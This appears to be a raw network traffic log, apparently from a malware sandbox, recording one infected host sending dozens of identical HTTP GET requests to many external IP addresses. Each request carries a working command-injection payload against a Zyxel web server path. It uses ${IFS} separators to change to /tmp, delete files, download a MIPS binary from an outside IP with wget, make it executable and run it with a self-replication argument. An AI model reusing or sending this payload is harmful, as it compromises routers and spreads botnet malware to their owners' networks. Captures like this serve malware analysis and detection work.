                                                Jan 12, 2024 18:24:40.992491007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5671192.168.2.1335486145.169.62.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992569923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5672192.168.2.135205051.47.153.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992626905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5673192.168.2.134777099.250.166.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992666006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5674192.168.2.1335254202.161.0.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992737055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5675192.168.2.1355838114.186.117.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992800951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5676192.168.2.1337294114.46.29.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992867947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5677192.168.2.1337828132.112.208.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992922068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5678192.168.2.134984057.35.136.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992964029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5679192.168.2.1356440221.134.43.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993048906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5680192.168.2.1359414186.94.131.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993079901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5681192.168.2.1360622156.102.136.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993132114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5682192.168.2.1341822163.226.79.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993200064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5683192.168.2.135414466.46.208.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993254900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5684192.168.2.13394488.54.190.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993305922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5685192.168.2.1360662167.83.68.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993356943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5686192.168.2.134329053.177.241.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993422031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5687192.168.2.1337438178.67.202.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993494987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5688192.168.2.1341200170.179.169.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993546009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5689192.168.2.1345492129.2.148.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993613005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5690192.168.2.1352634209.243.86.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993658066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5691192.168.2.135842092.86.244.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993696928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5692192.168.2.133970894.202.17.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993742943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5693192.168.2.1357394167.104.193.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993846893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5694192.168.2.134324485.170.6.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993874073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5695192.168.2.1356736104.56.217.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.993971109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5696192.168.2.1340378194.75.185.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994019032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5697192.168.2.135936285.70.226.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994055033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5698192.168.2.1354832110.132.64.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994144917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5699192.168.2.1340696203.133.168.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994198084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5700192.168.2.1357026223.132.9.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994285107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5701192.168.2.1351436191.75.79.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994334936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5702192.168.2.1348320189.25.208.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994405985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5703192.168.2.1335464155.234.165.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994474888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5704192.168.2.1336114109.136.184.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994522095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5705192.168.2.1349346120.191.44.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994554996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5706192.168.2.1357734109.24.63.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994574070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5707192.168.2.1356674103.31.61.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994674921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5708192.168.2.1355908135.191.181.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994704962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5709192.168.2.1357388196.246.95.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994755983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5710192.168.2.134360868.40.36.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.994954109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5711192.168.2.1355248114.16.212.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995008945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5712192.168.2.1354988219.113.86.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995042086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5713192.168.2.135949265.69.84.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995137930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5714192.168.2.1353324193.237.85.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995141029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5715192.168.2.1335864102.100.109.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995197058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5716192.168.2.1344100181.54.34.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995243073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5717192.168.2.133911217.126.164.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995311022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5718192.168.2.133277235.237.217.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995385885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5719192.168.2.1341256207.171.39.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995429039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5720192.168.2.1348410188.8.48.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995482922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5721192.168.2.1355334217.13.106.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995538950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5722192.168.2.1353090159.11.128.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995594978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5723192.168.2.1338754148.147.7.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995635986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5724192.168.2.135527212.109.195.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995709896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5725192.168.2.134295042.30.155.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995773077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5726192.168.2.1336222179.44.8.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995826960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5727192.168.2.133798699.114.124.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.995913029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5728192.168.2.1338114193.174.169.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996016026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5729192.168.2.1343410132.37.236.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996089935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5730192.168.2.1333770122.24.79.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996174097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5731192.168.2.135930017.108.5.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996232986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5732192.168.2.135782098.72.66.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996304035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5733192.168.2.1334694121.111.157.50443
                                                TimestampBytes transferredDirectionData
